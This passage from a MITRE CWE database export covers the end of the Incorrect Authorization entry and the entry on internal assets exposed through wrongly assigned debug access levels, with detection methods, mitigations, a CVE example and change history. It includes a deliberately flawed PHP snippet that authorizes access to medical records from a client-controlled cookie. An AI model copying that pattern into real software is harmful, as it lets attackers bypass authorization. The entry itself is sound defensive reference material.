"Note": "\n\nAssuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource.\n",
"Type": "Terminology"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2011-05-24",
"SubmissionName": "CWE Content Team",
"SubmissionOrganization": "MITRE",
"SubmissionReleaseDate": "2011-06-01",
"SubmissionVersion": "1.13",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Related_Attack_Patterns, Relationships",
"ModificationDate": "2011-06-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, References, Relationships",
"ModificationDate": "2011-09-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2013-02-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Modes_of_Introduction, References, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2018-03-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2019-06-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-12-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Alternate_Terms",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Potential_Mitigations",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes, Relationships",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Taxonomy_Mappings",
"ModificationDate": "2024-02-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-02-29",
"ModificationVersion": "4.14",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Description, Diagram, Relationships, Terminology_Notes",
"ModificationDate": "2024-11-19",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-11-19",
"ModificationVersion": "4.16",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "Contributed or reviewed taxonomy mappings for ISA/IEC 62443",
"ContributionDate": "2023-11-14",
"ContributionName": "participants in the CWE ICS/OT SIG 62443 Mapping Fall Workshop",
"ContributionOrganization": null,
"ContributionReleaseDate": "2024-02-29",
"ContributionType": "Content",
"ContributionVersion": "4.14",
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "Provided diagram to improve CWE usability",
"ContributionDate": "2024-02-29",
"ContributionName": "Abhi Balakrishnan",
"ContributionOrganization": null,
"ContributionReleaseDate": "2024-11-19",
"ContributionType": "Content",
"ContributionVersion": "4.16",
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
}
] |
Allowed-with-Review
|
This CWE entry is a Class and might have Base-level children that would be more appropriate
|
Examine children of this entry to see if there is a better fit
|
[
"Abstraction"
] | null |
[
{
"CweID": "285",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "\n\nAutomated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries.\n\n\nGenerally, automated static analysis tools have difficulty detecting custom authorization schemes. Even if they can be customized to recognize these schemes, they might not be able to tell whether the scheme correctly performs the authorization in a way that cannot be bypassed or subverted by an attacker.\n",
"DetectionMethodID": "DM-6",
"Effectiveness": "Limited",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
},
{
"Description": "Automated dynamic analysis may not be able to find interfaces that are protected by authorization checks, even if those checks contain weaknesses.",
"DetectionMethodID": null,
"Effectiveness": null,
"EffectivenessNotes": null,
"Method": "Automated Dynamic Analysis"
},
{
"Description": "\n\nThis weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.\n\n\nSpecifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms.\n",
"DetectionMethodID": null,
"Effectiveness": "Moderate",
"EffectivenessNotes": "These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints.",
"Method": "Manual Analysis"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tBinary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Manual Static Analysis - Binary or Bytecode"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tWeb Application Scanner\n\t\tWeb Services Scanner\n\t\tDatabase Scanners",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Automated Results Interpretation"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tHost Application Interface Scanner\n\t\tFuzz Tester\n\t\tFramework-based Fuzzer\n\t\tForced Path Execution\n\t\tMonitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Manual Results Interpretation"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tFocused Manual Spotcheck - Focused manual analysis of source\n\t\tManual Source Code Review (not inspections)",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Manual Static Analysis - Source Code"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tContext-configured Source Code Weakness Analyzer",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis - Source Code"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tHighly cost effective:\n```\n\n\t\tFormal Methods / Correct-By-Construction\n\t```\n\t\tCost effective for partial coverage:\n```\n\n\t\tInspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Architecture or Design Review"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following code could be for a medical records application. It displays a record to already authenticated users, confirming the user's authorization using a value stored in a cookie.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t$role = $_COOKIES['role'];\n\tif (!$role) {\n\t\t$role = getRole('user');\n\t\tif ($role) {\n\t\t\t// save the cookie to send out in future responses\n\t\t\tsetcookie(\"role\", $role, time()+60*60*2);\n\t\t}\n\t\telse{\n\t\t\tShowLoginScreen();\n\t\t\tdie(\"\\n\");\n\t\t}\n\t}\n\tif ($role == 'Reader') {\n\t\tDisplayMedicalHistory($_POST['patient_ID']);\n\t}\n\telse{\n\t\tdie(\"You are not Authorized to view this record\\n\");\n\t}\n```",
"IntroText": null,
"Language": "PHP",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The programmer expects that the cookie will only be set when getRole() succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie. However, the attacker can easily set the \"role\" cookie to the value \"Reader\". As a result, the $role variable is \"Reader\", and getRole() is never invoked. The attacker has bypassed the authorization system.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null |
/data/images/CWE-863-Diagram
|
High
|
[
"An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: \"No access\", \"Read access\", \"Change access\", and \"Full control\". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object."
] | 1
|
[
[
"284",
"285",
"863"
]
] |
[
"1244",
"551",
"639",
"647",
"804",
"942"
] |
1244
|
Internal Asset Exposed to Unsafe Debug Access Level or State
|
Base
|
Simple
|
Stable
|
The product uses physical debug or test
interfaces with support for multiple access levels, but it
assigns the wrong debug access level to an internal asset,
providing unintended access to the asset from untrusted debug
agents.
|
Debug authorization can have multiple levels of access, defined such that different system internal assets are accessible based on the current authorized debug level. Other than debugger authentication (e.g., using passwords or challenges), the authorization can also be based on the system state or boot stage. For example, full system debug access might only be allowed early in boot after a system reset to ensure that previous session data is not accessible to the authenticated debugger.
If this protection mechanism does not ensure that internal assets have the correct debug access level during each boot stage or change in system state, an attacker could obtain sensitive information from the internal asset using a debugger.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "System on Chip",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Read Memory"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality"
]
},
{
"Impact": [
"Modify Memory"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Integrity"
]
},
{
"Impact": [
"Gain Privileges or Assume Identity",
"Bypass Protection Mechanism"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Authorization",
"Access Control"
]
}
] |
[
{
"Description": "\n\nFor security-sensitive assets accessible over debug/test interfaces, only allow trusted agents.\n",
"Effectiveness": "High",
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"Implementation"
],
"Strategy": null
},
{
"Description": "Apply blinding [REF-1219] or masking techniques in strategic areas.",
"Effectiveness": "Limited",
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Add shielding or tamper-resistant protections to the device, which increases the difficulty and cost for accessing debug/test interfaces.",
"Effectiveness": "Limited",
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] |
[
{
"Description": "After ROM code execution, JTAG access is disabled. But before the ROM code is executed, JTAG access is possible, allowing a user full system access. This allows a user to modify the boot flow and successfully bypass the secure-boot process.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2019-18827",
"Reference": "CVE-2019-18827"
}
] | null | null |
[
"114"
] |
[
{
"Authors": [
"F-Secure Labs"
],
"Edition": null,
"ExternalReferenceID": "REF-1056",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Multiple Vulnerabilities in Barco Clickshare: JTAG access is not permanently disabled",
"URL": "https://labs.f-secure.com/advisories/multiple-vulnerabilities-in-barco-clickshare/",
"URLDate": null
},
{
"Authors": [
"Kurt Rosenfeld",
"Ramesh Karri"
],
"Edition": null,
"ExternalReferenceID": "REF-1057",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Attacks and Defenses for JTAG",
"URL": "https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=5406671",
"URLDate": null
},
{
"Authors": [
"Monodeep Kar",
"Arvind Singh",
"Santosh Ghosh",
"Sanu Mathew",
"Anand Rajan",
"Vivek De",
"Raheem Beyah",
"Saibal Mukhopadhyay"
],
"Edition": null,
"ExternalReferenceID": "REF-1219",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": "02",
"PublicationYear": "2018",
"Publisher": null,
"Section": null,
"Title": "Blindsight: Blinding EM Side-Channel Leakage using Built-In Fully Integrated Inductive Voltage Regulator",
"URL": "https://arxiv.org/pdf/1802.09096.pdf",
"URLDate": "2023-04-07"
},
{
"Authors": null,
"Edition": null,
"ExternalReferenceID": "REF-1377",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2021",
"Publisher": null,
"Section": null,
"Title": "csr_regile.sv line 938",
"URL": "https://github.com/HACK-EVENT/hackatdac19/blob/57e7b2109c1ea2451914878df2e6ca740c2dcf34/src/csr_regfile.sv#L938",
"URLDate": "2023-12-13"
},
{
"Authors": null,
"Edition": null,
"ExternalReferenceID": "REF-1378",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2021",
"Publisher": null,
"Section": null,
"Title": "Fix for csr_regfile.sv line 938",
"URL": "https://github.com/HACK-EVENT/hackatdac19/blob/a7b61209e56c48eec585eeedea8413997ec71e4a/src/csr_regfile.sv#L938C31-L938C56",
"URLDate": "2023-12-13"
}
] |
[
{
"Note": "CWE-1191 and CWE-1244 both involve physical debug access, but the weaknesses are different. CWE-1191 is effectively about missing authorization for a debug interface, i.e. JTAG. CWE-1244 is about providing internal assets with the wrong debug access level, exposing the asset to untrusted debug agents.",
"Type": "Relationship"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-02-12",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.0",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Name, Observed_Examples, Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Maintenance_Notes",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships, Weakness_Ordinalities",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
